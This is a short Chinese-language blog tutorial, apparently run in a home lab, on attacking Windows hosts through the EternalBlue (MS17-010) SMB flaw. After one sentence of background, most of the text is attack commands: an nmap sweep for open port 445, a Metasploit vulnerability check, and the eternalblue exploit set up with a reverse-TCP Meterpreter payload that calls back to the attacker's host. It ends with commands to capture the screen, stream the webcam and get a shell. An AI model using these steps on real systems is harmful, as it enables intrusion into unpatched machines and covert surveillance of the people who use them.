永恒之蓝是指2017年5月12日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。
因为永恒之蓝攻击的是445端口, 扫描局域网中所有开放的445端口
1 | nmap -sS -p 445 192.168.1.1-245 |
打开MSF, 加载扫描模块, 扫描靶机是否存在该漏洞1
2
3
4use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.0.130 (靶机的IP)
exploit
加载攻击模块,并配置参数1
2
3
4
5
6
7
8
9
10
11
12
13use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.0.130 (靶机的IP)
set lhost 192.168.0.129 (发起攻击的主机IP)
set lport 443 (监听的端口)
exploit
功能展现
1.捕捉桌面:
meterpreter >screenshot
2.视屏开启
meterpreter > webcam_stream
3.获取shell
If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !